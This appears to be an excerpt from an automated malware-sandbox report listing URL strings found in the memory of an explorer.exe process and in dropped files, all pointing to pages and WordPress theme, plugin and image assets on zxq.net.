                    Source: explorer.exe, 00000004.00000003.2658511629.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325265874.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192097102.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192186591.0000000000729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/0810
                    Source: explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192097102.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192186591.0000000000729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/C:
                    Source: explorer.exe, 00000004.00000003.2658511629.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448601457.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448550627.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/E
                    Source: explorer.exe, 00000004.00000003.2658511629.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448601457.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325265874.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448550627.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/J
                    Source: explorer.exe, 00000004.00000003.2192097102.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192186591.0000000000729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/K
                    Source: explorer.exe, 00000004.00000003.2658511629.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448601457.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325265874.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448550627.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/LMEMpbr
                    Source: explorer.exe, 00000004.00000003.2192097102.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192186591.0000000000729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/LMEMpbr4U1
                    Source: explorer.exe, 00000004.00000003.2448601457.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325265874.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448550627.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/LMEMpbr_W
                    Source: explorer.exe, 00000004.00000003.2658511629.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448601457.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325265874.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448550627.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192097102.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192186591.0000000000729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/U
                    Source: explorer.exe, 00000004.00000003.2658511629.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192097102.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192186591.0000000000729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/XY
                    Source: explorer.exe, 00000004.00000003.2448601457.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448550627.0000000000725000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/Yr
                    Source: explorer.exe, 00000004.00000003.2658511629.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/Z
                    Source: explorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/br
                    Source: explorer.exe, 00000004.00000003.2658511629.000000000072A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/br4U1
                    Source: explorer.exe, 00000004.00000003.2658511629.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448601457.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448550627.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/cisc
                    Source: explorer.exe, 00000004.00000003.2658511629.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448601457.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325265874.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448550627.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192097102.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192186591.0000000000729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/h
                    Source: explorer.exe, 00000004.00000003.2658511629.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/hYZ
                    Source: explorer.exe, 00000004.00000003.2448601457.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325265874.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448550627.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192097102.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192186591.0000000000729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/m32
                    Source: explorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/nOX
                    Source: explorer.exe, 00000004.00000003.2325385308.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658748665.00000000006F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/rrC:
                    Source: explorer.exe, 00000004.00000003.2658511629.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448601457.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325265874.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448550627.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192097102.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192186591.0000000000729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/v
                    Source: explorer.exe, 00000004.00000003.2658511629.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448601457.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448550627.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/vi
                    Source: explorer.exe, 00000004.00000003.2658511629.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448601457.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325265874.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448550627.0000000000725000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/x
                    Source: explorer.exe, 00000004.00000003.2325437743.0000000003BA4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325504423.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448655083.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192097102.000000000071E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658846234.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2556013660.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325385308.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325214501.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192268321.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192222397.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658748665.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325465264.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.drString found in binary or memory: https://zxq.net/wp-content/plugins/table-of-contents-plus/front.min.js?ver=2106
                    Source: explorer.exe, 00000004.00000003.2325437743.0000000003BA4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325504423.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658846234.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325214501.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325465264.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.drString found in binary or memory: https://zxq.net/wp-content/plugins/table-of-contents-plus/screen.min.css?ver=2106
                    Source: explorer.exe, 00000004.00000003.2658511629.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325504423.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448601457.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658846234.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448550627.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325346008.0000000003B88000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325465264.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.drString found in binary or memory: https://zxq.net/wp-content/themes/smart-mag/css/icons/fonts/ts-icons.woff2?v2.2
                    Source: explorer.exe, 00000004.00000003.2325437743.0000000003BA4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325504423.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192222397.0000000003B88000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658846234.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325214501.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325465264.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.drString found in binary or memory: https://zxq.net/wp-content/themes/smart-mag/css/icons/icons.css?ver=7.1.1
                    Source: explorer.exe, 00000004.00000003.2325437743.0000000003BA4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325504423.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192222397.0000000003B88000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658846234.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325214501.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325465264.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.drString found in binary or memory: https://zxq.net/wp-content/themes/smart-mag/css/lightbox.css?ver=7.1.1
                    Source: explorer.exe, 00000004.00000003.2325437743.0000000003BA4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325504423.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448655083.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192097102.000000000071E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658846234.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2556013660.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325385308.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325214501.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192268321.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192222397.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658748665.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325465264.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.drString found in binary or memory: https://zxq.net/wp-content/themes/smart-mag/js/jquery.mfp-lightbox.js?ver=7.1.1
                    Source: explorer.exe, 00000004.00000003.2325437743.0000000003BA4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325504423.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448655083.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192097102.000000000071E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658846234.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2556013660.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325385308.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325214501.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192268321.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192222397.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658748665.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325465264.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.drString found in binary or memory: https://zxq.net/wp-content/themes/smart-mag/js/jquery.sticky-sidebar.js?ver=7.1.1
                    Source: explorer.exe, 00000004.00000003.2325437743.0000000003BA4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325504423.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448655083.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192097102.000000000071E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658846234.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2556013660.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325385308.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325214501.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192268321.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192222397.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658748665.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325465264.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.drString found in binary or memory: https://zxq.net/wp-content/themes/smart-mag/js/lazyload.js?ver=7.1.1
                    Source: explorer.exe, 00000004.00000003.2325437743.0000000003BA4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325504423.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448655083.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192097102.000000000071E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658846234.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2556013660.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325385308.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325214501.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658748665.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325465264.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.drString found in binary or memory: https://zxq.net/wp-content/themes/smart-mag/js/theme.js?ver=7.1.1
                    Source: explorer.exe, 00000004.00000003.2325437743.0000000003BA4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325504423.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658846234.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325214501.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325465264.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.drString found in binary or memory: https://zxq.net/wp-content/themes/smart-mag/style.css?ver=7.1.1
                    Source: cmsys.cmn.4.drString found in binary or memory: https://zxq.net/wp-content/uploads/2022/02/ZXQ-FB.png
                    Source: cmsys.cmn.4.drString found in binary or memory: https://zxq.net/wp-content/uploads/2022/02/ZXQ.png
                    Source: explorer.exe, 00000004.00000003.2325437743.0000000003BA4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325504423.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192222397.0000000003B88000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658846234.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325214501.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325465264.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.drString found in binary or memory: https://zxq.net/wp-content/uploads/2022/02/zxq-icon-150x150.png
                    Source: cmsys.cmn.4.drString found in binary or memory: https://zxq.net/wp-content/uploads/2022/02/zxq-icon-300x300.png
                    Source: explorer.exe, 00000004.00000003.2325437743.0000000003BA4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325504423.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192097102.000000000071E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658846234.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325214501.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325465264.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.drString found in binary or memory: https://zxq.net/wp-content/uploads/2022/03/follow-us-on-google-news-banner-black-150x58.png
                    Source: cmsys.cmn.4.drString found in binary or memory: https://zxq.net/wp-content/uploads/2022/03/follow-us-on-google-news-banner-black-300x117.png
                    Source: explorer.exe, 00000004.00000003.2325437743.0000000003BA4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325504423.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192097102.000000000071E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658846234.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325214501.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325465264.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.drString found in binary or memory: https://zxq.net/wp-content/uploads/2022/03/follow-us-on-google-news-banner-black-450x175.png
                    Source: explorer.exe, 00000004.00000003.2325437743.0000000003BA4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325504423.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192097102.000000000071E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658846234.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325214501.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325465264.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.drString found in binary or memory: https://zxq.net/wp-content/uploads/2022/03/follow-us-on-google-news-banner-black.png
                    Source: cmsys.cmn.4.drString found in binary or memory: https://zxq.net/wp-content/uploads/2024/10/Choosing-the-Right-Commercial-Cleaning-Company-for-Your-B
                    Source: cmsys.cmn.4.drString found in binary or memory: https://zxq.net/wp-content/uploads/2024/10/Customizable-Online-Games-A-Personalized-Gaming-Experienc
                    Source: explorer.exe, 00000004.00000003.2325437743.0000000003BA4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325504423.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192097102.000000000071E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658846234.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325214501.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325465264.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.drString found in binary or memory: https://zxq.net/wp-content/uploads/2024/10/DIY-Home-Repair-Projects-for-Busy-Singaporeans-1024x576.p
                    Source: explorer.exe, 00000004.00000003.2325437743.0000000003BA4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325504423.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192097102.000000000071E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658846234.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325214501.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325465264.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.drString found in binary or memory: https://zxq.net/wp-content/uploads/2024/10/DIY-Home-Repair-Projects-for-Busy-Singaporeans-150x84.png
                    Source: cmsys.cmn.4.drString found in binary or memory: https://zxq.net/wp-content/uploads/2024/10/DIY-Home-Repair-Projects-for-Busy-Singaporeans-300x169.pn
                    Source: explorer.exe, 00000004.00000003.2325437743.0000000003BA4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325504423.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192097102.000000000071E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658846234.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325214501.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325465264.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.drString found in binary or memory: https://zxq.net/wp-content/uploads/2024/10/DIY-Home-Repair-Projects-for-Busy-Singaporeans-450x253.pn
                    Source: explorer.exe, 00000004.00000003.2325437743.0000000003BA4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325504423.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192097102.000000000071E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658846234.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325214501.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325465264.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.drString found in binary or memory: https://zxq.net/wp-content/uploads/2024/10/DIY-Home-Repair-Projects-for-Busy-Singaporeans-768x432.pn
